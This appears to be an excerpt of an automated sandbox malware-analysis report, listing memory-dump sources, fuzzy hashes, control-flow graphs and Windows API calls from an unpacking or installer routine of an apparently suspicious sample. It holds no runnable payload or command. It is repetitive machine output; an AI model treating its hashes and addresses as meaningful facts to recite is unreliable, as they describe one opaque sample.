                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                              • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
                                              • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                              • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 498 407291-407295 499 4072b7-4072c4 498->499 500 407297-407399 498->500 502 4072c7-4072dc 499->502 508 4073c3-4073c7 500->508 504 4072f6-40730c 502->504 505 4072de-4072f4 502->505 506 40730f-407316 504->506 505->506 509 407318-40731c 506->509 510 40733d 506->510 511 407427-40743a 508->511 512 4073c9-4073ea 508->512 513 407322-40733a 509->513 514 4074cb-4074d5 509->514 515 407343-407349 510->515 511->515 516 407403-407416 512->516 517 4073ec-407401 512->517 513->510 519 4074e1-4074f4 514->519 522 4074f6 515->522 523 406aee 515->523 520 407419-407420 516->520 517->520 521 4074f9-4074fd 519->521 524 4073c0 520->524 525 407422 520->525 522->521 526 406af5-406af9 523->526 527 406c35-406c56 523->527 528 406b9a-406b9e 523->528 529 406c0a-406c0e 523->529 524->508 538 4073a5-4073bd 525->538 539 4074d7 525->539 526->519 535 406aff-406b0c 526->535 527->502 533 406ba4-406bbd 528->533 534 40744a-407454 528->534 530 406c14-406c28 529->530 531 407459-407463 529->531 536 406c2b-406c33 530->536 531->519 537 406bc0-406bc4 533->537 534->519 535->522 540 406b12-406b58 535->540 536->527 536->529 537->528 543 406bc6-406bcc 537->543 538->524 539->519 541 406b80-406b82 540->541 542 406b5a-406b5e 540->542 546 406b90-406b98 541->546 547 406b84-406b8e 541->547 544 406b60-406b63 GlobalFree 542->544 545 406b69-406b77 GlobalAlloc 542->545 548 406bf6-406c08 543->548 549 406bce-406bd5 543->549 544->545 545->522 550 406b7d 545->550 546->537 547->546 547->547 548->536 551 406be0-406bf0 GlobalAlloc 549->551 552 406bd7-406bda GlobalFree 549->552 550->541 551->522 551->548 552->551
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                              • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
                                              • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                              • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 553 406fa7-406fab 554 406fb1-406fb5 553->554 555 407062-407071 553->555 556 4074f6 554->556 557 406fbb-406fcf 554->557 558 4072c7-4072dc 555->558 563 4074f9-4074fd 556->563 559 407495-40749f 557->559 560 406fd5-406fde 557->560 561 4072f6-40730c 558->561 562 4072de-4072f4 558->562 567 4074e1-4074f4 559->567 565 406fe0 560->565 566 406fe3-407013 560->566 564 40730f-407316 561->564 562->564 569 407318-40731c 564->569 570 40733d-407349 564->570 565->566 574 406adf-406ae8 566->574 567->563 571 407322-40733a 569->571 572 4074cb-4074d5 569->572 570->574 571->570 572->567 574->556 575 406aee 574->575 576 406af5-406af9 575->576 577 406c35-406c56 575->577 578 406b9a-406b9e 575->578 579 406c0a-406c0e 575->579 576->567 584 406aff-406b0c 576->584 577->558 582 406ba4-406bbd 578->582 583 40744a-407454 578->583 580 406c14-406c28 579->580 581 407459-407463 579->581 585 406c2b-406c33 580->585 581->567 586 406bc0-406bc4 582->586 583->567 584->556 587 406b12-406b58 584->587 585->577 585->579 586->578 590 406bc6-406bcc 586->590 588 406b80-406b82 587->588 589 406b5a-406b5e 587->589 593 406b90-406b98 588->593 594 406b84-406b8e 588->594 591 406b60-406b63 GlobalFree 589->591 592 406b69-406b77 GlobalAlloc 589->592 595 406bf6-406c08 590->595 596 406bce-406bd5 590->596 591->592 592->556 597 406b7d 592->597 593->586 594->593 594->594 595->585 598 406be0-406bf0 GlobalAlloc 596->598 599 406bd7-406bda GlobalFree 596->599 597->588 598->556 598->595 599->598
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                              • Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
                                              • Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                              • Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 600 406aac-406acf 601 406ad1-406ad4 600->601 602 406ad9-406adc 600->602 604 4074f9-4074fd 601->604 603 406adf-406ae8 602->603 605 4074f6 603->605 606 406aee 603->606 605->604 607 406af5-406af9 606->607 608 406c35-4072dc 606->608 609 406b9a-406b9e 606->609 610 406c0a-406c0e 606->610 616 4074e1-4074f4 607->616 617 406aff-406b0c 607->617 620 4072f6-40730c 608->620 621 4072de-4072f4 608->621 614 406ba4-406bbd 609->614 615 40744a-407454 609->615 611 406c14-406c28 610->611 612 407459-407463 610->612 618 406c2b-406c33 611->618 612->616 619 406bc0-406bc4 614->619 615->616 616->604 617->605 622 406b12-406b58 617->622 618->608 618->610 619->609 626 406bc6-406bcc 619->626 625 40730f-407316 620->625 621->625 623 406b80-406b82 622->623 624 406b5a-406b5e 622->624 629 406b90-406b98 623->629 630 406b84-406b8e 623->630 627 406b60-406b63 GlobalFree 624->627 628 406b69-406b77 GlobalAlloc 624->628 633 407318-40731c 625->633 634 40733d-407349 625->634 631 406bf6-406c08 626->631 632 406bce-406bd5 626->632 627->628 628->605 638 406b7d 628->638 629->619 630->629 630->630 631->618 639 406be0-406bf0 GlobalAlloc 632->639 640 406bd7-406bda GlobalFree 632->640 635 407322-40733a 633->635 636 4074cb-4074d5 633->636 634->603 635->634 636->616 638->623 639->605 639->631 640->639
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                              • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
                                              • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                              • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 641 406efa-406efe 642 406f00-406f17 641->642 643 406f1c-406f5f 641->643 644 4072c7-4072dc 642->644 643->644 645 4072f6-40730c 644->645 646 4072de-4072f4 644->646 647 40730f-407316 645->647 646->647 648 407318-40731c 647->648 649 40733d-407349 647->649 650 407322-40733a 648->650 651 4074cb-4074d5 648->651 656 4074f6 649->656 657 406aee 649->657 650->649 654 4074e1-4074f4 651->654 655 4074f9-4074fd 654->655 656->655 658 406af5-406af9 657->658 659 406c35-406c56 657->659 660 406b9a-406b9e 657->660 661 406c0a-406c0e 657->661 658->654 666 406aff-406b0c 658->666 659->644 664 406ba4-406bbd 660->664 665 40744a-407454 660->665 662 406c14-406c28 661->662 663 407459-407463 661->663 667 406c2b-406c33 662->667 663->654 668 406bc0-406bc4 664->668 665->654 666->656 669 406b12-406b58 666->669 667->659 667->661 668->660 672 406bc6-406bcc 668->672 670 406b80-406b82 669->670 671 406b5a-406b5e 669->671 675 406b90-406b98 670->675 676 406b84-406b8e 670->676 673 406b60-406b63 GlobalFree 671->673 674 406b69-406b77 GlobalAlloc 671->674 677 406bf6-406c08 672->677 678 406bce-406bd5 672->678 673->674 674->656 679 406b7d 674->679 675->668 676->675 676->676 677->667 680 406be0-406bf0 GlobalAlloc 678->680 681 406bd7-406bda GlobalFree 678->681 679->670 680->656 680->677 681->680
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                              • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
                                              • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                              • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 682 407018-40701c 683 407023-40703a 682->683 684 40701e-407071 682->684 686 4072c7-4072dc 683->686 684->686 688 4072f6-40730c 686->688 689 4072de-4072f4 686->689 690 40730f-407316 688->690 689->690 691 407318-40731c 690->691 692 40733d-407349 690->692 693 407322-40733a 691->693 694 4074cb-4074d5 691->694 699 4074f6 692->699 700 406aee 692->700 693->692 697 4074e1-4074f4 694->697 698 4074f9-4074fd 697->698 699->698 701 406af5-406af9 700->701 702 406c35-406c56 700->702 703 406b9a-406b9e 700->703 704 406c0a-406c0e 700->704 701->697 709 406aff-406b0c 701->709 702->686 707 406ba4-406bbd 703->707 708 40744a-407454 703->708 705 406c14-406c28 704->705 706 407459-407463 704->706 710 406c2b-406c33 705->710 706->697 711 406bc0-406bc4 707->711 708->697 709->699 712 406b12-406b58 709->712 710->702 710->704 711->703 715 406bc6-406bcc 711->715 713 406b80-406b82 712->713 714 406b5a-406b5e 712->714 718 406b90-406b98 713->718 719 406b84-406b8e 713->719 716 406b60-406b63 GlobalFree 714->716 717 406b69-406b77 GlobalAlloc 714->717 720 406bf6-406c08 715->720 721 406bce-406bd5 715->721 716->717 717->699 722 406b7d 717->722 718->711 719->718 719->719 720->710 723 406be0-406bf0 GlobalAlloc 721->723 724 406bd7-406bda GlobalFree 721->724 722->713 723->699 723->720 724->723
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                              • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
                                              • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                              • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 725 406f64-406f68 726 406f6a-406f86 725->726 727 406f8b-406fa2 725->727 728 4072c7-4072dc 726->728 727->728 729 4072f6-40730c 728->729 730 4072de-4072f4 728->730 731 40730f-407316 729->731 730->731 732 407318-40731c 731->732 733 40733d-407349 731->733 734 407322-40733a 732->734 735 4074cb-4074d5 732->735 740 4074f6 733->740 741 406aee 733->741 734->733 738 4074e1-4074f4 735->738 739 4074f9-4074fd 738->739 740->739 742 406af5-406af9 741->742 743 406c35-406c56 741->743 744 406b9a-406b9e 741->744 745 406c0a-406c0e 741->745 742->738 750 406aff-406b0c 742->750 743->728 748 406ba4-406bbd 744->748 749 40744a-407454 744->749 746 406c14-406c28 745->746 747 407459-407463 745->747 751 406c2b-406c33 746->751 747->738 752 406bc0-406bc4 748->752 749->738 750->740 753 406b12-406b58 750->753 751->743 751->745 752->744 756 406bc6-406bcc 752->756 754 406b80-406b82 753->754 755 406b5a-406b5e 753->755 759 406b90-406b98 754->759 760 406b84-406b8e 754->760 757 406b60-406b63 GlobalFree 755->757 758 406b69-406b77 GlobalAlloc 755->758 761 406bf6-406c08 756->761 762 406bce-406bd5 756->762 757->758 758->740 763 406b7d 758->763 759->752 760->759 760->760 761->751 764 406be0-406bf0 GlobalAlloc 762->764 765 406bd7-406bda GlobalFree 762->765 763->754 764->740 764->761 765->764
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                              • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
                                              • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                              • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 766 403411-403439 GetTickCount 767 403569-403571 call 402fc6 766->767 768 40343f-40346a call 403590 SetFilePointer 766->768 773 403573-403577 767->773 774 40346f-403481 768->774 775 403483 774->775 776 403485-403493 call 40357a 774->776 775->776 779 403499-4034a5 776->779 780 40355b-40355e 776->780 781 4034ab-4034b1 779->781 780->773 782 4034b3-4034b9 781->782 783 4034dc-4034f8 call 406aac 781->783 782->783 784 4034bb-4034db call 402fc6 782->784 789 403564 783->789 790 4034fa-403502 783->790 784->783 791 403566-403567 789->791 792 403504-40350c call 4060e4 790->792 793 403525-40352b 790->793 791->773 796 403511-403513 792->796 793->789 795 40352d-40352f 793->795 795->789 797 403531-403544 795->797 799 403560-403562 796->799 800 403515-403521 796->800 797->774 798 40354a-403559 SetFilePointer 797->798 798->767 799->791 800->781 801 403523 800->801 801->797
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00403425
                                                • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FilePointer$CountTick
                                              • String ID:
                                              • API String ID: 1092082344-0
                                              • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                              • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
                                              • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                              • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D
                                              APIs
                                              • GlobalFree.KERNEL32(0075EBF0), ref: 00401C0B
                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree
                                              • String ID: open
                                              • API String ID: 3394109436-2758837156
                                              • Opcode ID: 035021540bba336811b1dfba62dc434646664820adc8a5b253f9979037e238d0
                                              • Instruction ID: 7ec0e89d64206a41b4ba8aabe80b5452bf6d7cb43955a649282e45c73046654a
                                              • Opcode Fuzzy Hash: 035021540bba336811b1dfba62dc434646664820adc8a5b253f9979037e238d0
                                              • Instruction Fuzzy Hash: F621C673A00250EBC720AFA4EE84D5A73B4AB04714765053BF952F72D0C6BCAC414BAD
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 004069ED
                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406A02
                                              • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406A0F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ObjectSingleWait$CodeExitProcess
                                              • String ID:
                                              • API String ID: 2567322000-0
                                              • Opcode ID: 40ac6e21dbe7336db41f889c5ae7a6a2dea1a819c6b4ad045de723e9d89aa510
                                              • Instruction ID: baa81a1a13de69ea1b9d4081f582e8c5525217bb9aa64379ce25c6334638d75d
                                              • Opcode Fuzzy Hash: 40ac6e21dbe7336db41f889c5ae7a6a2dea1a819c6b4ad045de723e9d89aa510
                                              • Instruction Fuzzy Hash: 22E0D871700208FBDB009B54DE05E9E7B6EEB44714F110137F701B6190C7B19E22DB94
                                              APIs
                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
